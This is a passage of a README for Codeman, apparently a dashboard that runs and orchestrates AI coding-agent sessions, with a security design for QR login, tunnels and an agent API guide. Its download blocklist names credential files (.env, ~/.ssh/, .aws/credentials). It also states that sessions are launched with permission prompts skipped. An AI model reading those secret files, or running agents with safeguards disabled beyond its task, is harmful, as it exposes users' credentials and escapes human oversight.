- **Crash-safe** — full state persists under the `orchestrator` key in `state.json`, so it survives restarts
|
||||
- **Driven from the UI or API** — the Orchestrator panel, or `POST /api/orchestrator/start` → `/approve` → `/status` (10 endpoints)
|
||||
|
||||
> Distinct from Ralph (a single-session autonomous loop): the orchestrator coordinates multi-phase, multi-agent execution. Full design: [`docs/orchestrator-loop-architecture.md`](docs/orchestrator-loop-architecture.md).
|
||||
|
||||
---
|
||||
|
||||
## Multi-Session Dashboard
|
||||
|
||||
Run **20 parallel sessions** with full visibility — real-time xterm.js terminals at 60fps, per-session token and cost tracking, tab-based navigation, and one-click management.
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/screenshots/multi-session-dashboard.png" alt="Multi-Session Dashboard" width="800">
|
||||
</p>
|
||||
|
||||
### Persistent Sessions
|
||||
|
||||
Every session runs inside **tmux** — sessions survive server restarts, network drops, and machine sleep. Auto-recovery on startup with dual redundancy. Ghost session discovery finds orphaned tmux sessions. Managed sessions are environment-tagged so the agent won't kill its own session.
|
||||
|
||||
### Hostname-Aware Window Title
|
||||
|
||||
Running Codeman on multiple hosts (laptop, dev box, NAS)? The browser tab title is `codeman:<hostname>` so you can tell which backend each tab points at without clicking in:
|
||||
|
||||
```bash
|
||||
codeman web # codeman:<os.hostname()>
|
||||
codeman web --title-hostname dev-box # codeman:dev-box (manual override for noisy hostnames)
|
||||
```
|
||||
|
||||
The title is templated into the served HTML on first byte, so it's correct from the very first paint and works without JavaScript. The same hostname prefix is applied to the tab-flash format (`⚠️ (N) codeman:<host>`) and to OS-level desktop notifications (`codeman:<host>: <event>`), so cross-host alerts in the system notification center are also unambiguous.
|
||||
|
||||
### Smart Token Management
|
||||
|
||||
| Threshold | Action | Result |
|
||||
| --------------- | --------------- | ---------------------------------- |
|
||||
| **110k tokens** | Auto `/compact` | Context summarized, work continues |
|
||||
| **140k tokens** | Auto `/clear` | Fresh start with `/init` |
|
||||
|
||||
### Notifications
|
||||
|
||||
Real-time desktop alerts when sessions need attention — `permission_prompt` and `elicitation_dialog` trigger critical red tab blinks, `idle_prompt` triggers yellow blinks. Click any notification to jump directly to the affected session. Hooks auto-configured per case directory.
|
||||
|
||||
### Ralph / Todo Tracking
|
||||
|
||||
Auto-detects Ralph Loops, `<promise>` tags, TodoWrite progress (`4/9 complete`), and iteration counters (`[5/50]`) with real-time progress rings and elapsed time tracking.
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/ralph-tracker-8tasks-44percent.png" alt="Ralph Loop Tracking" width="800">
|
||||
</p>
|
||||
|
||||
### Run Summary
|
||||
|
||||
Click the chart icon on any session tab to see a timeline of everything that happened — respawn cycles, token milestones, auto-compact triggers, idle/working transitions, hook events, errors, and more.
|
||||
|
||||
### Zero-Flicker Terminal
|
||||
|
||||
Terminal-based AI agents (Claude Code's Ink, OpenCode's Bubble Tea) redraw the screen on every state change. Codeman implements a 6-layer anti-flicker pipeline for smooth 60fps output across all sessions:
|
||||
|
||||
```
|
||||
PTY Output → 16ms Server Batch → DEC 2026 Wrap → SSE → Client rAF → xterm.js (60fps)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## More Features
|
||||
|
||||
- **Self-update** — git-clone installs under systemd/launchd update in place from **App Settings → Updates**: it detects the latest release, auto-stashes a dirty tree, and streams build progress across the service restart (npm installs report as non-updatable)
|
||||
- **Multi-CLI** — run **Claude Code**, **OpenCode**, or **Codex** per session; env-var prefixes auto-gate (`CLAUDE_CODE_*` vs `OPENCODE_*` vs `CODEX_*`). See [`docs/opencode-integration.md`](docs/opencode-integration.md)
|
||||
- **Effort & Ultracode** — set a per-session default effort (`low`–`max`) or enable **ultracode** (dynamic multi-agent workflows). Soft defaults only — switchable anytime with `/effort` in-session. Extended-thinking budget is configurable too
|
||||
- **Voice input** — dictate prompts with Deepgram Nova-3 (Web Speech API fallback): toggle recording, auto-silence stop, live level meter (`Ctrl+Shift+V`)
|
||||
- **Image input** — paste or drag-and-drop images straight into a session
|
||||
- **Gesture control** _(opt-in)_ — a MediaPipe hand-tracking overlay to grab/drag session windows and pinch buttons, hands-free. Enable with `CODEMAN_GESTURE=1` + App Settings → Display
|
||||
- **Multi-monitor span** _(macOS)_ — one click opens a browser window maximized across all displays, so floating agent/gesture panels can cross the physical seam
|
||||
- **CJK / IME input** — full composition support for Chinese / Japanese / Korean
|
||||
- **OS notifications & hostname-aware titles** — desktop alerts and tab titles are prefixed `codeman:<host>` so multi-host setups stay unambiguous
|
||||
|
||||
---
|
||||
|
||||
## Remote Access — Cloudflare Tunnel
|
||||
|
||||
Access Codeman from your phone or any device outside your local network using a free [Cloudflare quick tunnel](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/) — no port forwarding, no DNS, no static IP required.
|
||||
|
||||
```
|
||||
Browser (phone/tablet) → Cloudflare Edge (HTTPS) → cloudflared → localhost:3000
|
||||
```
|
||||
|
||||
**Prerequisites:** Install [`cloudflared`](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/downloads/) and set `CODEMAN_PASSWORD` in your environment.
|
||||
|
||||
```bash
|
||||
# Quick start
|
||||
./scripts/tunnel.sh start # Start tunnel, prints public URL
|
||||
./scripts/tunnel.sh url # Show current URL
|
||||
./scripts/tunnel.sh stop # Stop tunnel
|
||||
./scripts/tunnel.sh status # Service status + URL
|
||||
```
|
||||
|
||||
The script auto-installs a systemd user service on first run. The tunnel URL is a randomly generated `*.trycloudflare.com` address that changes each time the tunnel restarts.
|
||||
|
||||
<details>
|
||||
<summary><strong>Persistent tunnel (survives reboots)</strong></summary>
|
||||
|
||||
```bash
|
||||
# Enable as a persistent service
|
||||
systemctl --user enable codeman-tunnel
|
||||
loginctl enable-linger $USER
|
||||
|
||||
# Or via the Codeman web UI: Settings → Tunnel → Toggle On
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><strong>Authentication</strong></summary>
|
||||
|
||||
1. First request → browser shows Basic Auth prompt (username: `admin` or `CODEMAN_USERNAME`)
|
||||
2. On success → server issues a `codeman_session` cookie (24h TTL, auto-extends on activity)
|
||||
3. Subsequent requests authenticate silently via cookie
|
||||
4. 10 failed attempts per IP → 429 rate limit (15-minute decay)
|
||||
|
||||
**Always set `CODEMAN_PASSWORD`** before exposing via tunnel — without it, anyone with the URL has full access to your sessions.
|
||||
|
||||
</details>
|
||||
|
||||
### QR Code Authentication
|
||||
|
||||
Typing a password on a phone keyboard is terrible. Codeman solves this with **ephemeral single-use QR tokens** — scan the code on your desktop, and your phone is instantly authenticated. No password prompt, no typing, no clipboard.
|
||||
|
||||
```
|
||||
Desktop displays QR → Phone scans → GET /q/Xk9mQ3 → Server validates
|
||||
→ Token atomically consumed (single-use) → Session cookie issued → 302 to /
|
||||
→ Desktop notified: "Device authenticated via QR" → New QR auto-generated
|
||||
```
|
||||
|
||||
Someone who only has the bare tunnel URL (without the QR) still hits the standard password prompt. The QR is the fast path; the password is the fallback.
|
||||
|
||||
#### How It Works
|
||||
|
||||
The server maintains a rotating pool of short-lived, single-use tokens. Each token consists of a 256-bit secret (`crypto.randomBytes(32)`) paired with a 6-character base62 short code used as an opaque lookup key in the URL path. The QR code encodes a URL like `https://abc-xyz.trycloudflare.com/q/Xk9mQ3` — the short code is a pointer, not the secret itself, so it never leaks through browser history, `Referer` headers, or Cloudflare edge logs.
|
||||
|
||||
Every **60 seconds**, the server automatically rotates to a fresh token. The previous token remains valid for a **90-second grace period** to handle the race where you scan right as rotation happens — after that, it's dead. Each token is **single-use**: the moment a phone successfully scans it, the token is atomically consumed and a new one is immediately generated for the desktop display.
|
||||
|
||||
#### Security Design
|
||||
|
||||
The design is informed by ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin) (USENIX Security 2025), which found 47 of the top-100 websites vulnerable to QR auth attacks due to 6 critical design flaws across 42 CVEs. Codeman addresses all six:
|
||||
|
||||
| USENIX Flaw | Mitigation |
|
||||
| ------------------------------------------ | ---------------------------------------------------------------------------------------------------------------- |
|
||||
| **Flaw-1**: Missing single-use enforcement | Token atomically consumed on first scan — replays always fail |
|
||||
| **Flaw-2**: Long-lived tokens | 60s TTL with 90s grace, auto-rotation via timer |
|
||||
| **Flaw-3**: Predictable token generation | `crypto.randomBytes(32)` — 256-bit entropy. Short codes use rejection sampling to eliminate modulo bias |
|
||||
| **Flaw-4**: Client-side token generation | Server-side only — tokens never leave the server until embedded in the QR |
|
||||
| **Flaw-5**: Missing status notification | Desktop toast: _"Device [IP] authenticated via QR (Safari). Not you? [Revoke]"_ — real-time QRLjacking detection |
|
||||
| **Flaw-6**: Inadequate session binding | IP + User-Agent stored for audit. Manual session revocation via API. HttpOnly + Secure + SameSite=lax cookies |
|
||||
|
||||
#### Timing-Safe Lookup
|
||||
|
||||
Short codes are stored in a `Map<shortCode, TokenRecord>`. Validation uses `Map.get()` — a hash-based O(1) lookup that reveals nothing about the target string through response timing. There is no character-by-character string comparison anywhere in the hot path, eliminating timing side-channel attacks entirely.
|
||||
|
||||
#### Rate Limiting (Dual Layer)
|
||||
|
||||
QR auth has its own rate limiting, completely independent from password auth:
|
||||
|
||||
- **Per-IP**: 10 failed QR attempts per IP trigger a 429 block (15-minute decay window) — separate counter from Basic Auth failures, so a fat-fingered password doesn't burn your QR budget
|
||||
- **Global**: 30 QR attempts per minute across all IPs combined — defends against distributed brute force. With 62^6 = 56.8 billion possible short codes and only ~2 valid at any time, brute force is computationally infeasible regardless
|
||||
|
||||
#### QR Code Size Optimization
|
||||
|
||||
The URL is kept deliberately short (`/q/` path + 6-char code = ~53-56 total characters) to target **QR Version 4** (33x33 modules) instead of Version 5 (37x37). Smaller QR codes scan faster on budget phones — modern devices read Version 4 in 100-300ms. The `/q/` prefix saves 7 bytes compared to `/qr-auth/`, which alone is the difference between QR versions.
|
||||
|
||||
#### Desktop Experience
|
||||
|
||||
The QR display auto-refreshes every 60 seconds via SSE with the SVG embedded directly in the event payload (~2-5KB) — no extra HTTP fetch, sub-50ms refresh. A countdown timer shows time remaining. A "Regenerate" button instantly invalidates all existing tokens and creates a fresh one (useful if you suspect the QR was photographed).
|
||||
|
||||
When someone authenticates via QR, the desktop shows a notification toast with the device's IP and browser — if it wasn't you, one click revokes all sessions.
|
||||
|
||||
#### Threat Coverage
|
||||
|
||||
| Threat | Why it doesn't work |
|
||||
| ------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------ |
|
||||
| **QR screenshot shared** | Single-use: consumed on first scan. 60s TTL: expired before the attacker can act. Desktop notification alerts you immediately. |
|
||||
| **Replay attack** | Atomic single-use consumption + 60s TTL. Old URLs always return 401. |
|
||||
| **Cloudflare edge logs** | Short code is an opaque 6-char lookup key, not the real 256-bit token. Single-use means replaying from logs always fails. |
|
||||
| **Brute force** | 56.8 billion combinations, ~2 valid at any time, dual-layer rate limiting blocks well before statistical feasibility. |
|
||||
| **QRLjacking** | 60s rotation forces real-time relay. Desktop toast provides instant detection. Self-hosted single-user context makes phishing implausible. |
|
||||
| **Timing attack** | Hash-based Map lookup — no string comparison timing leak. |
|
||||
| **Session cookie theft** | HttpOnly + Secure + SameSite=lax + 24h TTL. Manual revocation at `POST /api/auth/revoke`. |
|
||||
|
||||
#### How It Compares
|
||||
|
||||
| Platform | Model | Comparison |
|
||||
| ---------------- | ------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| **Discord** | Long-lived token, no confirmation, [repeatedly exploited](https://owasp.org/www-community/attacks/Qrljacking) | Codeman: single-use + TTL + notification |
|
||||
| **WhatsApp Web** | Phone confirms "Link device?", ~60s rotation | Comparable rotation; WhatsApp adds explicit confirmation (acceptable tradeoff for single-user) |
|
||||
| **Signal** | Ephemeral public key, E2E encrypted channel | Stronger crypto, but [exploited by Russian state actors in 2025](https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger) via social engineering despite it |
|
||||
|
||||
> Full design rationale, security analysis, and implementation details: [`docs/qr-auth-plan.md`](docs/qr-auth-plan.md)
|
||||
|
||||
---
|
||||
|
||||
## Security
|
||||
|
||||
Codeman launches sessions with `--dangerously-skip-permissions`, so the web UI is by design a remote-code-execution surface for whoever can reach it — the whole security model exists to control _who_ that is. Recent hardening (v0.9.0 + v0.9.5) closes the browser-driven attack paths that bite self-hosted dev tools. Full model: [`docs/security-architecture.md`](docs/security-architecture.md). **Found a vulnerability?** See [`SECURITY.md`](SECURITY.md) for private disclosure and the list of known limitations.
|
||||
|
||||
### Network & access
|
||||
|
||||
- **Loopback by default** — binds `127.0.0.1`, reachable only from the same machine, so the no-password default is safe out of the box. Binding a non-loopback host without `CODEMAN_PASSWORD` _starts but prints a loud warning_ with three concrete fixes (set a password, loopback + an authenticated tunnel, or explicitly acknowledge with `--allow-unauthenticated-network`)
|
||||
- **Optional auth, real sessions** — HTTP Basic via `CODEMAN_USERNAME` (default `admin`) / `CODEMAN_PASSWORD`. Success issues an opaque 256-bit `codeman_session` cookie (`randomBytes(32)`) — validated server-side, not client-signed, so it can't be forged offline (24h TTL, auto-extend, device-context audit log)
|
||||
- **Per-IP rate limiting** — 10 failed attempts → `429` with `Retry-After` (15-min decay). A valid cookie or correct password recovers _immediately_ even while an attacker hammers the same IP — important because all tunnel traffic shares one loopback IP. QR auth has its own separate limiter
|
||||
|
||||
### Always-on browser hardening (v0.9.5)
|
||||
|
||||
These run for **every** request — before auth, even on the default no-password loopback install:
|
||||
|
||||
- **Host-header allowlist → blocks DNS rebinding.** A custom domain rebound to `127.0.0.1` is rejected with `403 host not allowed` before any handler runs. Allowed: `localhost`, any IP literal, the bind host, `.ts.net` / `.trycloudflare.com` / `.cfargotunnel.com`, the active managed tunnel, and `CODEMAN_ALLOWED_HOSTS` (add custom reverse-proxy domains here — comma-separated; exact host or leading-dot `.suffix` for subdomains)
|
||||
- **Cross-site Origin / CSRF guard.** On state-changing methods (`POST`/`PUT`/`PATCH`/`DELETE`) the `Origin` must pass the same allowlist, else `403 cross-site request blocked`. A _missing_ Origin is allowed (so `curl`, the CLI, and Claude Code hooks keep working); only a present-but-foreign or opaque `null` origin is rejected
|
||||
- **Raw `text/plain` bodies.** The global parser no longer JSON-parses `text/plain`, closing the CORS "simple request" CSRF vector where a cross-site `fetch` could smuggle JSON into a write route with no preflight
|
||||
- **WebSocket origin validation.** The terminal WS upgrade runs the same Host + Origin check and closes with code `4003` on failure (anti-CSWSH)
|
||||
- **XSS-escaped agent output.** AI-derived strings (tool names, command arguments, subagent descriptions) are HTML-escaped at every injection site before rendering in the subagent / activity panels
|
||||
|
||||
### Input, files & headers
|
||||
|
||||
- **Schema-validated inputs** — every API body is checked with Zod v4 schemas; a `CLAUDE_CODE_*` / `OPENCODE_*` / `CODEX_*` env-prefix allowlist gates which settings each CLI can receive
|
||||
- **Path containment** — file routes `realpath` before boundary checks (no TOCTOU); `..`, absolute paths, and symlinks resolving outside the working dir are rejected. Caps: 10 MB text preview / 50 MB raw & download; `/api/download` blocklists sensitive paths (`.env`, `*credentials*`, `~/.ssh/`, `.aws/credentials`). SVG/HTML is served `octet-stream` + `nosniff` + attachment so it downloads rather than executes
|
||||
- **Security headers** — `Content-Security-Policy` (`default-src 'self'`, every exception enumerated), `X-Content-Type-Options: nosniff`, `X-Frame-Options: SAMEORIGIN`, HSTS over HTTPS, and CORS reflected **only** for `localhost` / `127.0.0.1` / `::1`
|
||||
|
||||
### Supply chain & isolation
|
||||
|
||||
- **Pinned & verified deps** — security-sensitive transitive deps are forced to patched versions via npm `overrides`; lockfile integrity is checked on every commit/PR (all entries resolve to `registry.npmjs.org` with `sha512` hashes). Public assets are NUL-byte-scanned and `node --check`-validated in CI
|
||||
- **Multi-instance isolation** — `CODEMAN_INSTANCE` scopes both the tmux socket (`-L codeman-<name>`) and data dir (`~/.codeman-<name>`) so two instances never attach each other's live sessions
|
||||
|
||||
> Mobile login uses single-use, 60-second QR tokens — see [QR Code Authentication](#qr-code-authentication) above for the full design (it addresses all 6 flaws from USENIX Security 2025's QR-login study).
|
||||
|
||||
---
|
||||
|
||||
## SSH Alternative (`sc`)
|
||||
|
||||
If you prefer SSH (Termius, Blink, etc.), the `sc` command is a thumb-friendly session chooser:
|
||||
|
||||
```bash
|
||||
sc # Interactive chooser
|
||||
sc 2 # Quick attach to session 2
|
||||
sc -l # List sessions
|
||||
```
|
||||
|
||||
Single-digit selection (1-9), color-coded status, token counts, auto-refresh. Detach with `Ctrl+A D`.
|
||||
|
||||
---
|
||||
|
||||
## Keyboard Shortcuts
|
||||
|
||||
> Ctrl bindings also accept Cmd on macOS.
|
||||
|
||||
| Shortcut | Action |
|
||||
| ------------------------------- | ------------------------------------------------------------- |
|
||||
| `Ctrl/Cmd+W` | Kill active session |
|
||||
| `Ctrl/Cmd/Option+K` | Find open session or start a new one |
|
||||
| `Ctrl/Cmd+Tab` | Next session |
|
||||
| `Alt/Option+[` / `Alt/Option+]` | Previous / next session |
|
||||
| `Alt/Option+1`-`Alt/Option+9` | Switch to tab N (physical keys, so macOS Option layouts work) |
|
||||
| `Ctrl+Shift+{` / `Ctrl+Shift+}` | Move active tab left / right |
|
||||
| `Ctrl/Cmd+L` | Clear terminal |
|
||||
| `Ctrl+Shift+R` | Restore terminal size |
|
||||
| `Ctrl+Shift+V` | Toggle voice input |
|
||||
| `Ctrl/Cmd +` / `-` | Font size |
|
||||
| `Ctrl/Cmd+?` | Keyboard help |
|
||||
| `Shift+Enter` | Insert newline (sent to terminal) |
|
||||
| `Escape` | Close panels & modals |
|
||||
|
||||
---
|
||||
|
||||
## Driving Codeman from an Agent — Programmatic Guide
|
||||
|
||||
For AI agents and automation that control Codeman without a browser: an agent that spins up worker sessions, a CI bot, or **Claude Code running _inside_ a Codeman session orchestrating other sessions**. Everything the UI does is HTTP + a CLI, so an agent can do it too.
|
||||
|
||||
### Detect that you're inside Codeman
|
||||
|
||||
When a CLI runs in a Codeman-managed session, these environment variables are set — read them instead of hardcoding anything:
|
||||
|
||||
| Variable | Meaning |
|
||||
| -------------------------- | ------------------------------------------------------------------------------------------------------------------------------------ |
|
||||
| `CODEMAN_MUX=1` | You're in a managed tmux session. **Never** `tmux kill-session` / `pkill claude` / `pkill tmux` — you'll kill yourself or a sibling. |
|
||||
| `CODEMAN_API_URL` | Base URL of the API (e.g. `https://127.0.0.1:3000`). Use it for every call below. |
|
||||
| `CODEMAN_SESSION_ID` | _Your own_ session id. Use it to avoid acting on yourself. |
|
||||
| `CODEMAN_HOOK_SECRET_FILE` | Path to the hook secret (required on `/api/hook-event` while a managed tunnel is up). |
|
||||
|
||||
### Rules of the road (read before you POST)
|
||||
|
||||
1. **Single-line input only.** Programmatic input is sent as literal text **+ Enter** in one shot. Multi-line strings break the agent TUI (Ink) — send one line, or split into multiple calls.
|
||||
2. **Make input idempotent.** Include a stable `clientId` and a monotonic per-session `seq` on `POST …/input`. The server de-duplicates, so a retry after a dropped connection can't double-deliver a prompt.
|
||||
3. **Auth.** If `CODEMAN_PASSWORD` is set, send HTTP Basic auth (user `admin` or `CODEMAN_USERNAME`) or a `codeman_session` cookie. The default loopback install is passwordless. A missing `Origin` header is allowed, so plain `curl` works; cross-site browser origins are rejected (CSRF guard).
|
||||
4. **Response envelope.** Most endpoints return `{ "success": true, "data": … }` (errors: `{ "success": false, "error", "errorCode" }`). A few legacy GETs return bare bodies — **handle both** (`body.data ?? body`).
|
||||
5. **`/api/v1/*`** is a stable alias of `/api/*`.
|
||||
|
||||
### Recipes
|
||||
|
||||
```bash
|
||||
API="${CODEMAN_API_URL:-http://127.0.0.1:3000}"
|
||||
# (add -u admin:"$CODEMAN_PASSWORD" to each call if a password is set)
|
||||
|
||||
# 1. See what's running
|
||||
curl -s "$API/api/sessions" | jq '.data // .'
|
||||
|
||||
# 2. Spin up a worker session (a "case" = named working dir)
|
||||
curl -s -X POST "$API/api/quick-start" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"caseName":"refactor-auth","mode":"claude","effort":"high"}' | jq
|
||||
|
||||
# 3. Send a prompt into a session (exactly-once: clientId + seq)
|
||||
curl -s -X POST "$API/api/sessions/$SID/input" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"input":"Run the test suite and summarize failures","useMux":true,"clientId":"agent-1","seq":1}'
|
||||
|
||||
# 4. Read the terminal back
|
||||
curl -s "$API/api/sessions/$SID/output" | jq -r '.data // .'
|
||||
|
||||
# 5. Stream live events (session output, agent activity, status)
|
||||
curl -sN "$API/api/events" # Server-Sent Events
|
||||
|
||||
# 6. Schedule recurring work (cron-style job)
|
||||
curl -s -X POST "$API/api/cron/jobs" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"name":"nightly-deps","agentType":"claude","workingDir":"/home/me/proj",
|
||||
"promptMode":"inline_text","promptText":"Update dependencies and open a PR",
|
||||
"inputMode":"typed","scheduleType":"daily","dailyTime":"03:00",
|
||||
"enabled":true,"concurrencyPolicy":"warn_only"}' | jq
|
||||
|
||||
# 7. Inspect background sub-agents and their transcripts
|
||||
curl -s "$API/api/subagents" | jq '.data // .'
|
||||
curl -s "$API/api/subagents/$AID/transcript" | jq -r '.data // .'
|
||||
|
||||
# 8. Whole-system snapshot (sessions, settings, respawn, stats)
|
||||
curl -s "$API/api/status" | jq
|
||||
```
|
||||
|
||||
### Or use the bundled CLI
|
||||
|
||||
The same operations are available as commands (`codeman <cmd>`, aliases in parentheses) — handy from a shell tool inside a session:
|
||||
|
||||
```bash
|
||||
codeman session start -d /path/to/repo # (s) start a session
|
||||
codeman session list # list sessions
|
||||
codeman session logs <id> # tail output
|
||||
codeman task add "fix the failing test" # (t) queue a task
|
||||
codeman ralph start --min-hours 8 # (r) launch the autonomous loop
|
||||
codeman attach <path> # attach a Claude hook context
|
||||
```
|
||||
|
||||
### Hooks (events flowing _back_ to Codeman)
|
||||
|
||||
Codeman registers Claude Code hooks that `POST /api/hook-event` (`permission_prompt`, `idle_prompt`, `stop`, `task_completed`, …) so the dashboard reacts in real time. This endpoint is auth-exempt on loopback but, under a managed tunnel, requires the `X-Codeman-Hook-Secret` header (read it from `$CODEMAN_HOOK_SECRET_FILE`). You normally don't call this by hand — Codeman wires it up — but it's how the autonomy layers "see" what the agent is doing.
|
||||
|
||||
> Full endpoint list and request/response shapes follow.
|
||||
|
||||
---
|
||||
|
||||
## API
|
||||
|
||||
REST over Fastify — **~160 handlers across 18 route modules**, plus an SSE stream and a WebSocket terminal channel. All responses use the `ApiResponse<T>` envelope (`{success, data}` / `{success, error, errorCode}`); `/api/v1/*` is a stable alias. A representative subset:
|
||||
|
||||
### Sessions
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| -------- | -------------------------- | ---------------------------------------------------------------------------------- |
|
||||
| `GET` | `/api/sessions` | List all |
|
||||
| `POST` | `/api/quick-start` | Create case + start session (`{caseName?, mode?, effort?, envOverrides?}`) |
|
||||
| `POST` | `/api/sessions/:id/input` | Send input (`{input, useMux?, clientId?, seq?}` — `clientId`+`seq` = exactly-once) |
|
||||
| `GET` | `/api/sessions/:id/output` | Read terminal output |
|
||||
| `DELETE` | `/api/sessions/:id` | Delete session |
|
||||
|
||||
### Respawn
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| ------ | ---------------------------------- | -------------------------- |
|
||||
| `POST` | `/api/sessions/:id/respawn/enable` | Enable with config + timer |
|
||||
| `POST` | `/api/sessions/:id/respawn/stop` | Stop controller |
|
||||
| `PUT` | `/api/sessions/:id/respawn/config` | Update config |
|
||||
|
||||
### Ralph / Todo
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| ------ | -------------------------------- | ---------------------- |
|
||||
| `GET` | `/api/sessions/:id/ralph-state` | Get loop state + todos |
|
||||
| `POST` | `/api/sessions/:id/ralph-config` | Configure tracking |
|
||||
|
||||
### Orchestrator
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| ------ | --------------------------- | ------------------------------- |
|
||||
| `POST` | `/api/orchestrator/start` | Start orchestration from a goal |
|
||||
| `POST` | `/api/orchestrator/approve` | Approve the generated plan |
|
||||
| `GET` | `/api/orchestrator/status` | Current phase + progress |
|
||||
| `POST` | `/api/orchestrator/stop` | Stop and clean up |
|
||||
|
||||
### Cron (scheduled jobs)
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| ---------------- | ---------------------------- | ----------------------- |
|
||||
| `GET` / `POST` | `/api/cron/jobs` | List / create cron jobs |
|
||||
| `PUT` / `DELETE` | `/api/cron/jobs/:id` | Update / delete a job |
|
||||
| `PUT` | `/api/cron/jobs/:id/enabled` | Enable / disable |
|
||||
| `POST` | `/api/cron/jobs/:id/run` | Run now |
|
||||
| `GET` | `/api/cron/jobs/:id/runs` | Run history |
|
||||
|
||||
### Subagents
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| -------- | ------------------------------- | -------------------------- |
|
||||
| `GET` | `/api/subagents` | List all background agents |
|
||||
| `GET` | `/api/subagents/:id` | Agent info and status |
|
||||
| `GET` | `/api/subagents/:id/transcript` | Full activity transcript |
|
||||
| `DELETE` | `/api/subagents/:id` | Kill agent process |
|
||||
|
||||
### System
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| ------ | ------------------------------- | ---------------------------------------------- |
|
||||
| `GET` | `/api/events` | SSE stream |
|
||||
| `GET` | `/api/status` | Full app state |
|
||||
| `POST` | `/api/hook-event` | Hook callbacks |
|
||||
| `GET` | `/api/system/update/check` | Check for a new release |
|
||||
| `POST` | `/api/system/update` | Self-update (git-clone installs) |
|
||||
| `POST` | `/api/clipboard` | Push text to all connected browsers (`{text}`) |
|
||||
| `GET` | `/api/sessions/:id/run-summary` | Timeline + stats |
|
||||
|
||||
---
|
||||
|
||||
## Architecture
|
||||
|
||||
```mermaid
|
||||
flowchart TB
|
||||
subgraph Codeman["CODEMAN"]
|
||||
subgraph Frontend["Frontend Layer"]
|
||||
UI["Web UI<br/><small>xterm.js + Agent Windows</small>"]
|
||||
API["REST API<br/><small>Fastify</small>"]
|
||||
SSE["SSE Events<br/><small>/api/events</small>"]
|
||||
end
|
||||
|
||||
subgraph Core["Core Layer"]
|
||||
SM["Session Manager"]
|
||||
S1["Session (PTY)"]
|
||||
S2["Session (PTY)"]
|
||||
RC["Respawn Controller"]
|
||||
ORC["Orchestrator Loop"]
|
||||
end
|
||||
|
||||
subgraph Detection["Detection Layer"]
|
||||
RT["Ralph Tracker"]
|
||||
SW["Subagent Watcher<br/><small>~/.claude/projects/*/subagents</small>"]
|
||||
TW["Team Watcher<br/><small>~/.claude/teams/*</small>"]
|
||||
end
|
||||
|
||||
subgraph Persistence["Persistence Layer"]
|
||||
SCR["Mux Manager<br/><small>(tmux)</small>"]
|
||||
SS["State Store<br/><small>state.json</small>"]
|
||||
end
|
||||
|
||||
subgraph External["External"]
|
||||
CLI["AI CLI<br/><small>Claude Code / OpenCode / Codex</small>"]
|
||||
BG["Background Agents<br/><small>(Task tool)</small>"]
|
||||
end
|
||||
end
|
||||
|
||||
UI <--> API
|
||||
API <--> SSE
|
||||
API --> SM
|
||||
SM --> S1
|
||||
SM --> S2
|
||||
SM --> RC
|
||||
SM --> ORC
|
||||
SM --> SS
|
||||
S1 --> RT
|
||||
S1 --> SCR
|
||||
S2 --> SCR
|
||||
RC --> SCR
|
||||
ORC --> SCR
|
||||
SCR --> CLI
|
||||
SW --> BG
|
||||
SW --> SSE
|
||||
TW --> SSE
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Development
|
||||
|
||||
```bash
|
||||
npm install
|
||||
npx tsx src/index.ts web # Dev mode
|
||||
npm run build # Production build
|
||||
npm test # Run tests
|
||||
```
|
||||
|
||||
See [CLAUDE.md](./CLAUDE.md) for full documentation.
|
||||
|
||||
---
|
||||
|
||||
## Codebase Quality
|
||||
|
||||
The codebase went through a comprehensive 7-phase refactoring that eliminated god objects, centralized configuration, and established modular architecture:
|
||||
|
||||
| Phase | What changed | Impact |
|
||||
| ------------------------ | ------------------------------------------------------------------------------------------------------------ | ------------------------------------------ |
|
||||
| **Performance** | Cached endpoints, SSE adaptive batching, buffer chunking | Sub-16ms terminal latency |
|
||||
| **Route extraction** | `server.ts` split into 15 domain route modules + auth middleware + port interfaces | **−67%** server.ts LOC (6,736 → 2,254) |
|
||||
| **Domain splitting** | `types.ts` → 16 domain files, `ralph-tracker` → 7 files, `respawn-controller` → 5 files, `session` → 6 files | No more god files |
|
||||
| **Frontend modules** | `app.js` → 18 extracted modules across infra, domain & feature layers | app.js core down to **~3.4K LOC** |
|
||||
| **Config consolidation** | ~70 scattered magic numbers → 10 domain-focused config files | Zero cross-file duplicates |
|
||||
| **Test infrastructure** | Shared mock library, 12 route test files, consolidated MockSession | Testable route handlers via `app.inject()` |
|
||||
|
||||
Full details: [`docs/archive/code-structure-findings.md`](docs/archive/code-structure-findings.md)
|
||||
|
||||
---
|
||||
|
||||
## Published Packages
|
||||
|
||||
### [`xterm-zerolag-input`](https://www.npmjs.com/package/xterm-zerolag-input)
|
||||
|
||||
[](https://www.npmjs.com/package/xterm-zerolag-input)
|
||||
|
||||
Instant keystroke feedback overlay for xterm.js. Eliminates perceived input latency over high-RTT connections by rendering typed characters immediately as a pixel-perfect DOM overlay. Zero dependencies, configurable prompt detection, full state machine with 78 tests.
|
||||
|
||||
```bash
|
||||
npm install xterm-zerolag-input
|
||||
```
|
||||
|
||||
[Full documentation](packages/xterm-zerolag-input/README.md)
|
||||
|
||||
---
|
||||
|
||||
## Versioning
|
||||
|
||||
Codeman follows [SemVer](https://semver.org/). What the version number actually
|
||||
commits to — and what counts as internal (the HTTP/SSE API, on-disk state,
|
||||
